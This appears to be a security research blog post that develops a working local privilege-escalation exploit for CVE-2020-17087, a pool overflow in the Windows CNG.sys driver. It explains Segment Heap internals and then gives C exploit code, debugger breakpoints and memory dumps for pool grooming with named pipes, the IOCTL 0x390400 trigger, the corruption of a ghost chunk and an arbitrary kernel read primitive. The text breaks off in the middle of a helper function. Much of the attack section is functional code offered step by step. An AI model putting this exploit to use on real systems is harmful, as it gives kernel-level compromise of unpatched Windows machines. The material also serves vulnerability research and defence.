[SAFE-ID: JIWO-2024-2959] Author: 大猪 Published: [2021-12-10]
CVE-2020-17087: Exploiting the CNG.sys IOCTL 0x390400 Pool Overflow Vulnerability

Overview

CVE-2020-17087 is a pool overflow vulnerability in the Windows CNG.sys driver that was found being exploited in the wild [1]. Although root-cause analyses of the vulnerability have been published, its exploitation technique is still relatively unknown. The most notable information is the disclosure by Google Project Zero (GP0) that the ITW sample "uses the buffer overflow to establish an arbitrary read / write primitive in the kernel space with the help of Named Pipe objects" [2]. In this blog post, we describe how this vulnerability can be exploited using the BlockSize attack method against the Windows 10 Segment Heap [5]. The exploit was developed on Windows 10 20H2 and tested on 1903 through 20H2.

Technical Details

As described in the GP0 issue tracker [1], the root cause lies in the function cng!CfgAdtpFormatPropertyBlock, which converts the requested buffer into a space-separated hex representation in Unicode; the requested size SrcLen is therefore multiplied by 6 to obtain the output buffer size. However, the size passed to cng!BCryptAlloc is incorrectly truncated to 16 bits. When SrcLen exceeds 0x10000 / 6, the allocation yields a buffer smaller than needed, which is subsequently overflowed during the string conversion.

Notes on Windows 10 Segment Heap Pool Overflow

Before we start, it is worthwhile to highlight the relevant Segment Heap information [3][4], exploitation techniques [5][6][7] and our own notes. If you are already familiar with them, feel free to jump to the next section.

Segment Heap front end: NonPagedPoolNx allocations made through nt!ExAllocatePoolWithTag call the ntoskrnl internal function nt!ExAllocateHeapPool, which then calls the respective front-end allocation routine depending on the requested size, either LFH or VS allocation, if the request can be satisfied. Larger blocks go to Block Allocation via nt!RtlpHpLargeAlloc.
When the front-end allocator does not have enough space, a new subsegment is requested from the backend allocator by calling nt!RtlpHpSegAlloc. The Low Fragmentation Heap (LFH) serves frequently used chunk sizes below 0x200 bytes; these are allocated via RtlpHpLfhContextAllocate from an LFH subsegment. Variable Size (VS) allocations serve chunks with sizes in [0x200, 0xFE0], and in (0xFE0, 0x20000] when the size is not page aligned (size & 0xFFF != 0); these are allocated via RtlpHpVsContextAllocateInternal from a VS subsegment. In general, LFH involves smaller chunks and caters to frequently used chunk sizes across the entire kernel, so its layout is more challenging to control. Given the constraints of the vulnerability and the attack methods available, we chose the VS allocator for the exploit.

Guard Pages: While experimenting with the pool layout, we encountered inaccessible pages roughly every 0x10 pages, but the vulnerability requires at least a 64KB "runway" to complete the overflow. At first this made exploitation look impossible. According to [4], "When VS subsegments, LFH subsegments and large blocks are allocated, a guard page is added at the end of the subsegment / block. For VS and LFH subsegments, the subsegment size should be >= 64KB for a guard page to be added. The guard page prevents a sequential overflow from VS blocks, LFH blocks and large blocks from corrupting adjacent data outside the subsegment (for VS / LFH blocks) or outside the block (for large blocks)". After more careful reading and experiments, we found that the subsegment size can actually range from 64KB to 256KB, as also noted in [5]. By reversing the relevant ntoskrnl functions, such as nt!RtlpHpSegAlloc and nt!RtlpHpVsSubsegmentCreate, we found that the only size that makes this exploit work is 128KB (0x20000). For example, by requesting a VS chunk of around 11 pages (0xae70), we can get a new subsegment with 23 pages (92KB) of usable space.
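The size-based routing described in the Segment Heap front end note can be summarized in a few lines of C. This is only a sketch built from the thresholds quoted above; the enum and function names are made up for illustration, and the real decision in ntoskrnl also depends on state this sketch ignores (for example, whether an LFH bucket is currently active for that size).

```c
#include <assert.h>
#include <stddef.h>

/* Expected allocator path for a pool request (illustrative names only). */
typedef enum {
    ROUTE_LFH,    /* Low Fragmentation Heap, only for frequently used sizes */
    ROUTE_VS,     /* Variable Size allocator */
    ROUTE_LARGE,  /* nt!RtlpHpLargeAlloc */
    ROUTE_OTHER   /* not covered by the notes above, e.g. page-aligned sizes */
} pool_route_t;

/* Classify a request size using only the thresholds quoted in the text. */
static pool_route_t classify_pool_request(size_t size)
{
    if (size > 0x20000)
        return ROUTE_LARGE;
    if (size < 0x200)
        return ROUTE_LFH;
    if (size <= 0xFE0)
        return ROUTE_VS;          /* [0x200, 0xFE0] */
    if ((size & 0xFFF) != 0)
        return ROUTE_VS;          /* (0xFE0, 0x20000], not page aligned */
    return ROUTE_OTHER;
}
```

Under this reading, the 0xae70 request mentioned above and the 0x3E0 and 0x7F0 chunks used later in the exploit all land in the VS allocator, which is why the layout work focuses on VS subsegments.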
Pool Header attacks: The CTF challenges [6][7] are built around a planted vulnerability, which normally has more favorable characteristics, and they turn out not to be close to this particular bug. The two attacks described in the SSTIC paper [5], namely the PoolType attack (CacheAligned) and the BlockSize attack, are however quite close. Because this bug writes the fixed pattern "XX 00 XX 00 20 00", only the BlockSize byte can be set, and only to a few values, as this byte sits at an even address and the odd bytes are not controllable:

Breakpoint 0 hit
cng!CfgAdtpFormatPropertyBlock+0x4e:
fffff803`3fd524aa e83549faff call cng!BCryptAlloc (fffff803`3fcf6de4)
1: kd> dt nt!_POOL_HEADER rax-10
   +0x000 PreviousSize : 0y00000000 (0)
   +0x000 PoolIndex : 0y00000000 (0)
   +0x002 BlockSize : 0y00110111 (0x37) ; 0x37 << 4 = 0x370 bytes
   +0x002 PoolType : 0y00000010 (0x2) ; NonPagedPoolMustSucceed
   +0x000 Ulong1 : 0x2370000
   +0x004 PoolTag : 0x62676e43 ; "Cngb"
   +0x008 ProcessBilled : 0xffff9d88`074b3b49 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x3b49
   +0x00a PoolTagHash : 0x74b

Dynamic Lookaside: "Freed chunk of size between 0x200 and 0xF80 bytes can be temporarily stored in a lookaside list in order to provide fast allocation. While they are in the lookaside these chunks won't go through their respective backend free mechanism." The SSTIC paper [5] describes a neat technique for enabling the dynamic lookaside for particular VS chunk sizes. It is a crucial part of both the BlockSize attack and the PoolType attack. In short, the provided algorithm tweaks the Balance Set Manager and the dynamic lookaside so that the most used chunk sizes since the last rebalance are enabled. This allows the same chunk to be freed and reallocated reliably even when its VS chunk header is corrupted, because the chunk only goes to the dynamic lookaside temporarily (i.e., it is not really freed by the backend, which avoids a BSOD).
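To make the "XX 00 XX 00 20 00" pattern from the Pool Header attacks note concrete, the following sketch models the two pieces of arithmetic involved: the 16-bit truncation of the 6 * SrcLen allocation size, and the encoding of one source byte into six output bytes. It is not the driver's code; the function names are hypothetical, and the use of lowercase hex digits is inferred from the memory dumps later in the post (the byte 0xdd shows up as 0x64, ASCII 'd').

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Bytes the formatter actually writes: 6 output bytes per source byte. */
static uint32_t formatted_size(uint32_t src_len)
{
    return 6u * src_len;
}

/* Size requested from the allocator after the 16-bit truncation. */
static uint16_t truncated_alloc_size(uint32_t src_len)
{
    return (uint16_t)formatted_size(src_len);
}

/* Bytes written past the end of the truncated allocation. */
static uint32_t overflow_bytes(uint32_t src_len)
{
    return formatted_size(src_len) - truncated_alloc_size(src_len);
}

/* Encode one source byte as two hex digits and a space, each stored as a
 * little-endian UTF-16 code unit. Lowercase digits are an assumption. */
static void encode_byte_utf16(uint8_t b, uint8_t out[6])
{
    static const char digits[] = "0123456789abcdef";
    out[0] = (uint8_t)digits[b >> 4];
    out[1] = 0;
    out[2] = (uint8_t)digits[b & 0xF];
    out[3] = 0;
    out[4] = ' ';
    out[5] = 0;
}
```

With the SrcLen of 0x2BF9 used later in the post, the formatter writes 0x107D6 bytes into a 0x7D6-byte allocation. When the final six bytes land on a _POOL_HEADER, the byte at offset +2 (BlockSize) receives the second hex digit, so a trailing source byte of 0xdd yields a BlockSize of 0x64.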
In this exploit, the dynamic lookaside enables us to convert the limited pool overflow into a controlled pool overflow using a size-changed "ghost chunk"; to search for the corrupted chunk by repeatedly freeing and reallocating chunks from an array; and to implement an arbitrary decrement primitive with the Quota Process Pointer Overwrite attack.

Named Pipe spray: For NonPagedPoolNx allocations, Named Pipes are a well-documented way to spray controlled data, and they can also be used to build an arbitrary read primitive. We can create a pair of Named Pipe handles for reading and writing with CreatePipe, which creates an _NP_CCB and an _NP_FCB object; these are linked to the Named Pipe FileObject from the process handle table and to a DataQueue object of type _NP_DATA_QUEUE. An _NP_DATA_QUEUE_ENTRY object is allocated and placed into the DataQueue when data is written to the Named Pipe write handle with WriteFile. The _NP_DATA_QUEUE_ENTRY object has a 0x30-byte header followed by the buffered data, which can be fully controlled (it is referred to as struct PipeQueueEntry in [3]). The exact mechanism can be studied from the ReactOS npfs source and by reverse engineering the relevant functions in npfs.sys. The key functions are NpAddDataQueueEntry, NpRemoveDataQueueEntry, NpPeek, NpInternalRead, etc. There are two main uses of _NP_DATA_QUEUE_ENTRY objects in this exploit. First, by overwriting both fields _NP_DATA_QUEUE_ENTRY.{QuotaInEntry, DataSize} with larger values, we can read out of bounds using PeekNamedPipe to leak the DataQueue pointer of the next DQE object. Second, by writing the leaked DataQueue pointer to the next block (a valid queue pointer is needed to avoid a BSOD) and changing the DataEntryType from 0 (Buffered) to 1 (Unbuffered), we can switch the DQE object to Unbuffered mode, which uses the Irp pointer as the data source.
By pointing Irp to a user-mode fake _IRP structure, we can reset the AssociatedIrp.SystemBuffer pointer in user mode before each read request, and thereby build an arbitrary read primitive.

struct _NP_DATA_QUEUE_ENTRY {                       // Let's call this DQE for short
    LIST_ENTRY QueueEntry;                          // +0x00
    PIRP Irp;                                       // +0x10 For Unbuffered and AAR primitive
    PSECURITY_CLIENT_CONTEXT ClientSecurityContext; // +0x18
    ULONG DataEntryType;                            // +0x20 Buffered 0, Unbuffered 1
    ULONG QuotaInEntry;                             // +0x24 Overwrite to get AAR
    ULONG DataSize;                                 // +0x28 Overwrite to get AAR
};

struct _NP_DATA_QUEUE {
    LIST_ENTRY Queue;      // points back to _NP_DATA_QUEUE_ENTRY
    ULONG QueueState;      // 1 (WriteEntries)
    ULONG BytesInQueue;
    ULONG EntriesInQueue;
    ULONG QuotaUsed;
    ULONG ByteOffset;
    ULONG Quota;
};

struct _NP_CCB; // Named Pipe Client Control Block
struct _NP_FCB; // Named Pipe File Control Block

Quota Process Pointer Overwrite: When a chunk has the PoolQuota bit (0x8) set in _POOL_HEADER.PoolType, the ProcessBilled field is linked to the _EPROCESS structure of the owning process. Allocating and freeing chunks with quota statistics increments or decrements values in the EPROCESS_QUOTA_BLOCK pointed to by _EPROCESS.QuotaBlock. Once we gain the ability to overwrite the ProcessBilled field, we can build an arbitrary decrement primitive with a crafted QuotaBlock pointer. Note that the data structures may have changed across builds of Windows 10, and that this method can have side effects depending on the field values in the process Token. The method requires an arbitrary read to leak the chunk address and the nt!ExpPoolQuotaCookie value, which are needed to encode an _EPROCESS pointer whose crafted QuotaBlock pointer points near the Token.Privileges field.

Exploitation Conditions

While exploiting the vulnerability, we noted some unique conditions that make the exploitation different from typical pool overflows:
While (1) and (2) give some flexibility in the range of objects we can overwrite and in the possible layouts, (3) in fact makes the exploitation quite challenging, because both the content and the offset of the overwrite become quite restrictive. This limits the choices of layout, objects and attack method for the 1903-20H2 Segment Heap.

Exploitation Strategy

The steps of exploitation on Windows 10 x64 20H1 are briefly outlined below. We use the following terms: 'g' for groups, the large chunk pattern of the spray; 'd' for dummy, the assisting allocations used to form groups; target chunks are the chunks expected to be overwritten; hole chunks are positioned so that the vulnerable CNG.sys buffer gets allocated into the layout; fill chunks are used to stabilize the hole chunks.
1. Spray groups

Because of the unique requirement of the vulnerability, more than 64KB is written to the CNG output buffer. And because of the properties of the Segment Heap, each VS subsegment is normally no larger than 64KB and is guarded by an inaccessible page before and after it. The idea is to make a sufficiently large VS request so that more than 64KB is allocated. Additionally, we want the allocations to form two big groups (g2 and g3), so that the hole chunks are in the first group and the target chunks are in the second group. Ideally each of the two groups should be 0x10 pages, so that no matter which hole is occupied by the CNG buffer, the resulting overflow is guaranteed to overwrite one target chunk at the desired offset without running out of bounds into the guard page.

; Windows 10 20H1 19041.572
.text:00000001C00624A7 movzx ecx, di ; NumberOfBytes
.text:00000001C00624AA call BCryptAlloc ; truncated
.text:00000001C00624AF mov rdx, rax

bu /p ffff9c833549f080 !cng + 624AA

PAGE:00000001C000D571 mov edx, edx ; NumberOfBytes
PAGE:00000001C000D573 mov ecx, 308h ; PoolType
PAGE:00000001C000D578 mov r8d, 7246704Eh ; Tag 'NpFr'
PAGE:00000001C000D57E call cs:__imp_ExAllocatePoolWithQuotaTag
PAGE:00000001C000D585 nop dword ptr [rax+rax+00h]

bu /p ffff9c833549f080 !npfs + D58A ".printf \"[+] Allocated %x bytes DataEntry at %p\\n\",r13, rax; g"

.text:00000001402C7C36 call RtlpHpVsSubsegmentCreate
.text:00000001402C7C3B mov rsi, rax

bu /p ffff9c833549f080 !nt + 2C7C3B ".printf \"[+] RtlpHpVsSubsegmentCreate(req=%x): alloc %p size %x \\n\",r13,rax,poi(rax+20)&0xffff; g"

The idea is to allocate two d1 VS chunks of close to 11 pages each, which results in a new 23-page subsegment; then free the two d1 chunks and request a 12-page d2 chunk and a 10-page d2 chunk. This ensures that d2 is placed at the start of the subsegment.
[+] RtlpHpVsSubsegmentCreate(req=ae70): alloc ffff8d8f57fc5000 size 1ffd
[+] Allocated ae40 bytes DataEntry at ffff8d8f57fc6000
[+] Allocated ae40 bytes DataEntry at ffff8d8f57fd1000
[+] RtlpHpVsSubsegmentCreate(req=be70): alloc ffff8d8f57fc5000 size 1ffd
[+] Allocated be40 bytes DataEntry at ffff8d8f57fc6000
[+] Allocated 9e30 bytes DataEntry at ffff8d8f57fd2000

As far as our current analysis goes, we have not found a way to create a subsegment larger than 128KB. The relevant code for allocating a subsegment larger than 64KB:

void __fastcall ExAllocateHeapPool(unsigned int PoolType, SIZE_T NumberOfBytes, ULONG Tag, ULONG_PTR BugCheckParameter2, char a5)
{
  // ...
  // RtlpHpLargeAlloc() for larger than 0x20000
  if ( _size > 0x20000 )
  {
    JUMPOUT(_size, *(unsigned int *)(v16 + 464), sub_1404675B9);
    v78 = RtlpHpLargeAlloc(v16, _size, _size, v54);
    v56 = v78;
  }
  else
  {
    // Use VsContext for <= 0x20000
    a6 = 0;
    v98 = 0i64;
    *(_OWORD *)a5a = 0i64;
    // One of system 0x20000 goes through here, when requested 0x9070
    v56 = (__int64)RtlpHpVsContextAllocateInternal( // goes to VsContext allocator!
            (_HEAP_VS_CONTEXT *)(v16 + 0x280),
            _size,
            v55,
            v54,
            (__int64)a5a,
            &a6);
    // ...
  }
  // ...
}

The final layout of the 23-page subsegment looks as follows:

[guard][g3,1P][------- g1, 10P --------][----- free space of 12P -----][guard]

2. Spray target chunks

This step fills the 12 pages of free space after g1 with target chunks.

target_pipes = prepare_pipe(0x3D0, spray_cnt * 12 * 4 / 10, 'T', 20);
spray(target_pipes);

On each of the 12 pages, 4 target chunks are allocated at similar offsets, with their _POOL_HEADER starting at 0x000, 0x3F0, 0x7E0 and 0xBD0 respectively. We expect the ghost chunk to be at 0x7E0 of a page, and the target chunk T to follow it at 0xBD0, as illustrated below:

ffffd20a`a3f797d0 9e15ce1a de4a7ff9 0000000e ffffd20a ......J.........
ffffd20a`a3f797e0 0a3e9f00 7246704e 6cbebe8c 0e5b280c ..>.NpFr...l.([.
ffffd20a`a3f797f0 9092a4b8 ffff870e 9092a4b8 ffff870e ................
ffffd20a`a3f79800 00000000 00000000 909cfa00 ffff870e ................
ffffd20a`a3f79810 00000000 000003a0 000003a0 44444444 ............DDDD
ffffd20a`a3f79820 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT

ffffd20a`a3f79bc0 9e15c20a de4a7ff9 0000001e ffffd20a ......J.........
ffffd20a`a3f79bd0 0a3e9f00 7246704e 6cbeb2bc 0e5b280c ..>.NpFr...l.([.
ffffd20a`a3f79be0 9092a878 ffff870e 9092a878 ffff870e x.......x.......
ffffd20a`a3f79bf0 00000000 00000000 909cfdc0 ffff870e ................
ffffd20a`a3f79c00 00000000 000003a0 000003a0 44444444 ............DDDD
ffffd20a`a3f79c10 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT

3. Create holes

Now we can free all the g1 chunks to get 10 pages of contiguous free space, and then allocate hole chunks (0x7F0 bytes). As a page cannot hold two hole chunks, each one is expected to be allocated at the start of a free page. After allocating all hole chunks, we allocate fill chunks (0x7B0 bytes) to occupy the free space after each hole chunk. Finally we free one hole for every 0x10 allocations to get roughly one hole per subsegment, for the last 2/3 of the subsegments created.

hole_pipes = prepare_pipe(0x800 - 0x40, spray_cnt, 'H', 0); // 0x7f0 chunk
fill_pipes = prepare_pipe(0x7D0 - 0x40, spray_cnt, 'F', 0); // 0x7b0 chunk
close_all_pipe_from_idx(g1_pipes, 0);
spray(hole_pipes);
spray(fill_pipes);
create_holes_from(hole_pipes, spray_cnt / 3);

With this spray layout, we expect each hole chunk to start at the beginning of a page.

4. Trigger the vulnerability in CNG

Now we are ready to trigger the vulnerability, and the CNG output buffer is expected to fall into one of the holes just created.
CONST DWORD DataBufferSize = 0x2BF9; // overwrites 0x2BF9 * 6 = 0x107D6 bytes, till 0x107E6
CONST DWORD IoctlSize = 4096 + DataBufferSize;
BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize);
RtlZeroMemory(IoctlData, IoctlSize);

*(DWORD*)    &IoctlData[0x00] = 0x1A2B3C4D;
*(DWORD*)    &IoctlData[0x04] = 0x10400;
*(DWORD*)    &IoctlData[0x08] = 1;
*(ULONGLONG*)&IoctlData[0x10] = 0x100;
*(DWORD*)    &IoctlData[0x18] = 3;
*(ULONGLONG*)&IoctlData[0x20] = 0x200;
*(ULONGLONG*)&IoctlData[0x28] = 0x300;
*(ULONGLONG*)&IoctlData[0x30] = 0x400;
*(DWORD*)    &IoctlData[0x38] = 0;
*(ULONGLONG*)&IoctlData[0x40] = 0x500;
*(ULONGLONG*)&IoctlData[0x48] = 0x600;
*(DWORD*)    &IoctlData[0x50] = DataBufferSize; // OVERFLOW
*(ULONGLONG*)&IoctlData[0x58] = 0x1000;
*(ULONGLONG*)&IoctlData[0x60] = 0;

RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12);
RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12);
memset(IoctlData + 0x1000 + DataBufferSize - 0x2, '\xdd', 0x2); // write 0x64 as BS

ULONG_PTR OutputBuffer = 0;
DWORD BytesReturned;
BOOL Status = DeviceIoControl(
    hCng,
    0x390400,
    IoctlData,
    IoctlSize,
    &OutputBuffer,
    sizeof(OutputBuffer),
    &BytesReturned,
    NULL
);

After the overflow, one of the target chunks at the desired offset has the first 6 bytes of its pool header overwritten, with the overflow ending at page offset 0x7E6:

1: kd> gu
cng!CfgAdtReportFunctionPropertyOperation+0x22d:
fffff803`65351e39 85c0 test eax,eax
1: kd> dc ffffd20a`a3f797d0
ffffd20a`a3f797d0 00200030 00300030 00640020 00200064 0. .0.0. .d.d. .
ffffd20a`a3f797e0 00640064 72460020 6cbebe8c 0e5b280c d.d. .Fr...l.([.
ffffd20a`a3f797f0 9092a4b8 ffff870e 9092a4b8 ffff870e ................
ffffd20a`a3f79800 00000000 00000000 909cfa00 ffff870e ................
ffffd20a`a3f79810 00000000 000003a0 000003a0 44444444 ............DDDD
ffffd20a`a3f79820 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT
ffffd20a`a3f79830 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT
ffffd20a`a3f79840 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT

The chunk has its BlockSize overwritten to 0x64, from the previous 0x3E. The other 5 neighboring bytes that were overwritten are either unused or do not matter. We refer to this chunk as the ghost chunk, since its size has grown to overlap the next target chunk T:

ffffd20a`a3f79bc0 9e15c20a de4a7ff9 0000001e ffffd20a ......J.........
ffffd20a`a3f79bd0 0a3e9f00 7246704e 6cbeb2bc 0e5b280c ..>.NpFr...l.([.
ffffd20a`a3f79be0 9092a878 ffff870e 9092a878 ffff870e x.......x.......
ffffd20a`a3f79bf0 00000000 00000000 909cfdc0 ffff870e ................
ffffd20a`a3f79c00 00000000 000003a0 000003a0 44444444 ............DDDD
ffffd20a`a3f79c10 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT

By freeing the ghost chunk and allocating it back again, we can write 0x640 - 0x3E0 = 0x260 bytes of arbitrary data into the target chunk T, effectively converting the single-byte overwrite of BlockSize into a controlled linear pool overflow. This primitive can be invoked repeatedly, allowing us to build more powerful primitives.

5. Locate the ghost chunk

Assuming the later sprayed target chunks are allocated sequentially, we can search backwards through the target chunk handles to locate the ghost chunk. The idea is to free one target chunk through its handle, allocate it back immediately, and then test whether a linear pool overflow has taken place on the adjacent target chunk. By searching backwards, we ensure that a freed target chunk that is not the ghost gets allocated back immediately.
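The offsets involved in the ghost chunk overlap can be checked with a few constants taken from the dumps above. The sketch below is only arithmetic over the values shown in the post (header sizes of 0x10, a 0x30-byte DQE header, pool headers at page offsets 0x7E0 and 0xBD0); the identifiers are hypothetical. It also shows where the recurring expression payload+0x3F0-0x30 in the original code of the following steps comes from: it is the distance from the start of the ghost chunk's pipe data to the DQE header of T.

```c
#include <assert.h>
#include <stdint.h>

enum {
    VS_HEADER_SIZE   = 0x10,   /* _HEAP_VS_CHUNK_HEADER in front of each chunk */
    POOL_HEADER_SIZE = 0x10,   /* _POOL_HEADER */
    DQE_HEADER_SIZE  = 0x30,   /* _NP_DATA_QUEUE_ENTRY header before the data */
    GHOST_HDR_OFF    = 0x7E0,  /* page offset of the ghost chunk _POOL_HEADER */
    TARGET_HDR_OFF   = 0xBD0   /* page offset of target chunk T _POOL_HEADER */
};

/* Chunk size in bytes encoded by _POOL_HEADER.BlockSize (units of 0x10). */
static uint32_t block_size_to_bytes(uint8_t block_size)
{
    return (uint32_t)block_size << 4;
}

/* Distance between consecutive target chunk pool headers on a page. */
static uint32_t chunk_stride(uint8_t block_size)
{
    return block_size_to_bytes(block_size) + VS_HEADER_SIZE;
}

/* Offset of T's DQE header measured from the ghost chunk's pipe data. */
static uint32_t target_dqe_offset_in_payload(void)
{
    uint32_t ghost_data = GHOST_HDR_OFF + POOL_HEADER_SIZE + DQE_HEADER_SIZE;
    uint32_t target_dqe = TARGET_HDR_OFF + POOL_HEADER_SIZE;
    return target_dqe - ghost_data;
}
```

From the same base, T's _POOL_HEADER sits 0x10 bytes before that offset and its VS chunk header 0x20 bytes before it, which matches the -0x10 and -0x20 adjustments used when the headers are rewritten.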
lookaside_t *ghost_lookaside = prepare_lookaside(0x640);
lookaside_t *target_lookaside = prepare_lookaside(0x3E0);
enable_lookaside(2, ghost_lookaside, target_lookaside);

With the help of the dynamic lookaside list, the freed ghost chunk (BlockSize 0x64) does not go through the normal free mechanism, which avoids a BSOD caused by its corrupted VS chunk header:

1: kd> dc ffffd20a`a3f797d0
ffffd20a`a3f797d0 00200030 00300030 00640020 00200064 0. .0.0. .d.d. . // VS header
ffffd20a`a3f797e0 00640064 72460020 6cbebe8c 0e5b280c d.d. .Fr...l.([.

Note that we cannot search sequentially forward, because there are around 64KB of corrupted chunks between the CNG buffer and the ghost chunk, and accidentally freeing any of them would result in an immediate BSOD. We construct the ghost chunk payload as follows; note that the root queue pointers are invalid. We need to stop the search as soon as the target chunk T is found, as freeing a DQE object with an invalid root queue leads to an immediate BSOD.

// craft ghost chunk data in ghost_pipes->payload
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00) = 0xdeadbeef;// leak_root_queue
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08) = 0xdeadbeef;// leak_root_queue
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x10) = 0xdeadbeef;// Irp
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x18) = 0;// Security Context
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20) = 0;// Type: Buffered
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x24) = 0xFFFFFFFF;// QuotaInEntry
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x28) = 0xFFFFFFFF;// DataSize
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30) = 0x67676767;// Buf[]: "gggg"

We can now start the search:

_LOG(output, "[*] Searching for overwritten target chunk\n");
for (ghost_idx = target_pipes->cnt - 2; ghost_idx >= 0; ghost_idx --) {
    BYTE buf[0x10] = { 0 };
    create_hole_at(target_pipes, ghost_idx); // free DataEntry T[i]
    fill_hole_at(ghost_pipes, ghost_idx);    // alloc ghost chunk
    peek_data(target_pipes, ghost_idx + 1, buf, 8);
    if ( *(UINT32*)buf == 0x67676767 ) {     // found "gggg"
        aar_index = ghost_idx + 1;
        aar_pipes = target_pipes;
        _LOG(output, "[+] Target chunk at: index 0x%X, handle 0x%llX\n", aar_index, (UINT64)target_pipes->writePipe[aar_index]);
        break;
    }
    fill_hole_at(target_pipes, ghost_idx);   // refill T[i]
}

6. Leak a valid root queue pointer

Once the ghost chunk is found, the adjacent target chunk T has been overwritten with controlled data, including DataSize and QuotaInEntry set to 0xFFFFFFFF. As already done when testing for the overwrite during the search in the previous step, we can leak a large amount of data with PeekNamedPipe. By reading past the end of the target chunk T into the next page, we can get a valid root queue pointer.

BYTE leak[0x480] = { 0 };
if ( !peek_data(target_pipes, aar_index, leak, sizeof(leak)) )
    exp_failed();
if (*(UINT32*)(leak + 0x430 - 0x8) != 0x3A0) {
    _LOG(output, "[-] Failed to locate next target chunk of size 0x3a0\n");
    exp_failed();
}
leak_root_queue = *(UINT64*)(leak + 0x430 - 0x30);
target_pool_hdr = *(UINT64*)(leak + 0x430 - 0x30 - 0x10);
_LOG(output, "[+] Leaked Queue Ptr at\t: 0x%p\n", leak_root_queue);

7. Build an AAR primitive

We can now invoke the controlled linear pool overflow again by freeing the ghost chunk and allocating it back. This time we set the root queue pointer to the valid pointer just leaked, set the IRP pointer to a crafted IRP object in user space, and set the DataEntryType to 1 (Unbuffered). The updated target chunk T can now be used as an arbitrary address read (AAR) primitive.
typedef struct pipe_queue_entry_sub {
    UINT64 unk;
    UINT64 unk1;
    UINT64 unk2;
    UINT64 data_ptr; // AssociatedIrp.SystemBuffer
} pipe_queue_entry_sub_t;

pipe_queue_entry_sub_t * fake_pipe_queue_sub;
fake_pipe_queue_sub = (pipe_queue_entry_sub_t *)malloc(sizeof(pipe_queue_entry_sub_t));
memset(fake_pipe_queue_sub, 0, sizeof(pipe_queue_entry_sub_t));

// update the ghost chunk, fix _POOL_HEADER
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00)= leak_root_queue; // QE.Flink
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08)= leak_root_queue; // QE.Blink
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x10)= (UINT64) fake_pipe_queue_sub;
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20)= 1; // Type: Unbuffered
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x10)=target_pool_hdr;
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x08)=0; // Clear ProcessBilled
*(UINT8*) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3)=0x2; // Clear Quota bit
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30)=0x6b61656c; // Buf[]: "leak"

create_hole_at(ghost_pipes, ghost_idx); // free ghost chunk
fill_hole_at(ghost_pipes, ghost_idx);   // rewrite ghost chunk "GGG0"
current_pipe_offset = 0;

We can now use these two functions to perform an AAR of 4, 8 or more bytes:

void arb_read_bytes(UINT64 where, int size, BYTE* readbuf) {
    fake_pipe_queue_sub->data_ptr = where;
    peek_data(aar_pipes, aar_index, readbuf, size);
    current_pipe_offset += size;
}

UINT64 arb_read(UINT64 where, int size) {
    BYTE readbuf[0x100] = { 0 };
    fake_pipe_queue_sub->data_ptr = where;
    peek_data(aar_pipes, aar_index, readbuf, size);
    current_pipe_offset += size;
    return size > 4 ? *(UINT64*)readbuf : *(UINT32*)readbuf;
}

8. Leak pointers and variables

With the AAR primitive and the leaked root queue pointer as a starting point, we can leak the pointers and variables needed in this exploit.
This step builds on the work and sample code in [3], and requires some reversing of the actual _NP_CCB (Named Pipe Client Control Block) and _NP_FCB (Named Pipe File Control Block) data structures. From the leaked root queue pointer, we can find the linked file object, and from there the device object and the driver object. From the driver object pointer we can get the function pointer NpFsdCreate. Although it still depends on the exact version of NPFS.sys, this offset is relatively stable within a build of Windows 10, so we can derive the !npfs base address. In the final version we search backwards from the NpFsdCreate pointer for the PE header by calling get_pe_base.

By trial and error, we found two ntoskrnl functions imported by npfs that have direct references to the ntoskrnl variables and pointers we need. We use find_nt_variables to extract their actual addresses in memory. This is a generic method, as ntoskrnl has many different binary releases from 1903 to 20H2. By parsing the code of the imported functions ExFreePoolWithTag and ExAllocatePoolWithQuotaTag, we can derive the addresses of nt!RtlpHpHeapGlobals, which is referenced when encoding / decoding the _HEAP_VS_CHUNK_HEADER; nt!ExpPoolQuotaCookie, which is later used to encode the ProcessBilled pointer in _POOL_HEADER; and nt!PsInitialSystemProcess, which is needed to traverse the active processes and find the _EPROCESS pointers of our own process and winlogon.exe.

The search is implemented by find_address(UINT64 start, BYTE* opcode, BYTE* before, BYTE* after), which takes the start address of the search and the opcode patterns before and after the address to look for. As the memory management code is relatively stable across different ntoskrnl binaries, this is expected to work generically for Windows 10. The algorithm may need adjustments if this step fails on a different build.
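The post does not show the body of find_address, so the following is only a minimal sketch of how such a pattern search might resolve a RIP-relative operand. It scans a local copy of code bytes rather than reading kernel memory through the AAR primitive, and the name find_rip_relative_target, its parameters and the explicit length arguments are all assumptions made for illustration. The idea is to match before, then the opcode bytes, skip the 4-byte displacement, match after, and add the signed displacement to the address of the next instruction.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for find_address(): look for the byte sequence
 *   <before> <opcode> <disp32> <after>
 * in a local copy of code mapped at code_va, and return the absolute address
 * that the RIP-relative disp32 refers to. Returns 0 if there is no match. */
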